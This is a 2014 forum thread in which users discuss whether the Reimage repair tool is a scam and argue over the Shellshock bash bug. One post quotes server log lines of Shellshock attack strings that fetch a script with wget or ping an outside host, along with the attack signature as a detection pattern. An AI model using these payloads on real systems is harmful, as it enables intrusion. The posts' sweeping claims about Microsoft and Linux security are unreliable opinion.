General Categories > Help!
Junk Pop-ups on the Forum
GreyGeek:
--- Quote from: SemperFiGuy on September 19, 2014, 11:51:32 AM ---Any opinions on Reimage? PC World likes it. Reimage provides nice remote diagnostic displays (all showing that your computer has computer-Ebola, of course) and doesn't cost all that much Any real security value/utility in it?.
--- End quote ---
No. A $70/yr subscription program that runs from the Internet to check your Windows operating system files ONLY, not your Windows application files, like Office, or any 3rd party apps that you may have installed. Those non-OS files can be infected as well, especially Office or Word. IF Reimage finds a system file on your computer with a signature different from its own version it will replace it. If Microsoft updates your files automatically, as you should allow it to, and replaces a system file that "Reimage" hasn't obtained yet, Reimage will replace the improved file with their older version, which may be infected with something that Reimage hasn't learned about yet. That's not good. It does, after all, have to get those OS files from Microsoft, and in the process its copy could get infected from malware on its own site.
Running Windows you need to have ALL the files on your system checked. Malwarebytes does this for a subscription fee. If you want to save money and use Microsoft's AV product, called "Security Essentials" you can download it from here:
http://www.microsoft.com/en-us/download/details.aspx?id=5201
The advantage is that all Microsoft system and application patches have to come through Microsoft itself. Going to a third party merely adds delay to the process.
By the way, computer magazines which feature proprietary software like Windows and other applications for which the user must purchase a license agreement (they NEVER own that software and it can be pulled out from under them at any time without notice) have a vested interest in not reporting damaging information related to any product which the maker of purchases ad space in their mag or on their web page. Such companies also hire folks to post glowing reviews about their products on various forums and to challenge negative posts. They also swamp Google search terms with web pages pretending to be "software review" sites but when you go there all you hear are glowing reviews. For example, do a Google search for "reimage scam". You'll get web page banners like:
Is Reimage a Scam? Our Shocking Reimage Review Reveals the Truth!
Reimage Repair Review , Is Reimage a Scam ?
Reimage Repair Scam « Product Scams
REIMAGE FREE REVIEW | Is it SCAM or LEGIT?
and more. Check them out and you'll see that all the reviews are 9's and higher and the comments are glowing, almost miraculous. For example, PC mag rates it 3/5 but if you check out the last link I gave, which is
http://www.free-review.org/reimage-3
you'll notice Reimage is rated at higher than 9 out of 10. That is prima facia proof to me that Reimage is basically a scam which does nothing of value except re-doing what Microsoft Update automatically does for free and more timely as well. If you use "whois" to locate who owns the servers those glowing reviews reside on you'll notice that they register them through anonymous register or hosting organizations. Companies that are doing business straight up do not do that.
SemperFiGuy:
Aha!
The old Reimage scam!!
First, let me thank you for the considerable energy and effort (not to mention knowledge and skill) which you put into the above posting.
And next, for saving me the $70+ Buck$ that I woulda happily spent to avoid future pop-up, virus, malware, and similar computer calamities.
Finally, and most importantly, for helping me sidestep the Great Expectations/Greater Letdown cycle that woulda happened somewhere along the line.
Deeply appreciated.
sfg
DR4NRA:
LMAO Linux and OS X are safe???? Guess there are some pretty smart crooks, big big security flaw.
http://www.zdnet.com/first-attacks-using-shellshock-bash-bug-discovered-7000034044/
GreyGeek:
--- Quote from: DR4NRA on September 26, 2014, 08:11:06 AM ---LMAO Linux and OS X are safe???? Guess there are some pretty smart crooks, big big security flaw.
--- End quote ---
Keep laughing. There were NO "smart crooks". Stephane Chazelas, a RedHat security engineer, discovered that Bash incorrectly handled trailing code in function definitions, during one of his many code reviews. Chazelas is one of hundreds of professional coders who continually run code reviews on Open Source GPL software.
The bug announcement was made on Sept 24th but my Kubuntu installation was automatically updated from the repository with the fix THAT morning before I heard about the bug. Logs before the announcement show no attempts at using that hole as an attack, but since that announcement those "smart crooks" have been pounding fruitlessly at the back doors, as logs reveal. Here are some examples of failed attempts, beginning one day after the announcement, but not before:
24.251.197.244 - - [25/Sep/2014:09:55:10 +0100] "GET / HTTP/1.1" 301 513 "-" "() { :; }; echo -e \"Content-Type: text/plain\\n\"; echo qQQQQQq"
109.95.210.196 - - [25/Sep/2014:17:52:45 +0100] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.1" 301 565 "-" "() { :;}; /bin/bash -c \"/usr/bin/wget http://singlesaints.com/firefile/temp?h=******.co.uk -O /tmp/a.pl\""
166.78.61.142 - - [25/Sep/2014:17:54:03 +0100] "GET / HTTP/1.1" 301 513 "-" "() { :;}; echo shellshock-scan > /dev/udp/pwn.nixon-security.se/4444"
93.103.21.231 - - [26/Sep/2014:03:17:21 +0100] "GET / HTTP/1.1" 301 513 "-" "() { :;}; wget 'http://taxiairportpop.com/s.php?s=http://*******.co.uk/'"
Here is the telltale set of symbols which reveal an attempt at a bash attack:
--- Code: ---"() { :;}; ...
--- End code ---
Now compare that lightening fast response in the Linux world with how responses occur in the world of Windows. Microsoft has threatened any security house with a law suit if their security experts announce a security hole. Microsoft requires that they pass all information on to Microsoft, which reserves the right to announce the bug and the patch, usually on the same day, but on a day of their choosing. Unfortunately, that day may be months or years after the hole was found, depending on Microsoft's financial needs. Fortune 500 companies, however, are given immediate notice of most bugs, along with suggested patches or bypasses until a permanent fix comes along, because they have the financial clout to sue Microsoft for losses occurred due to holes in Microsoft's software. You and I don't. You, however, are left swinging in the breeze with your britches down, hoping some "smart crook" doesn't hit your vulnerable system. That is a forlorn hope, however, because all it takes is an email hitting your inbox with an executable that has been recently modified to bypass the AV software that you run. You don't even have to look at the email or even open it. It all has to do with Microsoft's "ActiveX" technology, which runs any executable it sees, regardless of where it sees it.
Sometimes, in response to certain holes, Microsoft's advice was to buy the next version of Windows, "which has the fix". Nice. Using their own security holes as a profit center.
So, laugh all you want. Your the one paying through the nose for Windows, Windows upgrades and Microsoft products and their upgrades on an endless update treadmill. $$$ For example, VISTA was supposed to replace XP but was so bad Microsoft made their users pay for Win7 as fast as they could push it out. Win7 is XP with lipstick. More recently Microsoft replaced Win7 with Win8, which was so bad that most folks refused to upgrade to it or buy computers or pones with Win8 on it, so Microsoft had to rush Win8.1 out, which is a step backward toward Win7, but you have to pay for it anyway.
Me? I've been running Linux since May 1st, 1998, and I've never even seen a Linux malware in the wild, much less get infected by one. The Bash bug isn't "malware" anyway. In order to execute a command on a Linux box remotely you first have to gain access to Linux operating system. To do that you have to break into the IPTables firewall which about every Linux distro runs. Kubuntu, for example, automatically blocks all 65,535 ports, making my box almost invisible when viewed from the Internet. I've been running Kubuntu since January of 2009 and I've never paid a single penny for it, or any of the software on it which I run, all of it world class software equal to or better than anything Microsoft makes, and certainly more secure.
So, laugh away. The laugh is on you.
SemperFiGuy:
Well, this post has engendered some interesting hi-tek conversation.
Meanwhile, my Forum visits are not longer interrupted by the Jumping Pop-ups, because I implemented many of the suggestions offered here to solve the problems.
Many, many thanks to All............................ It is certainly a most welcome relief to have a working computer again.
sfg
Navigation
[0] Message Index
[*] Previous page
Go to full version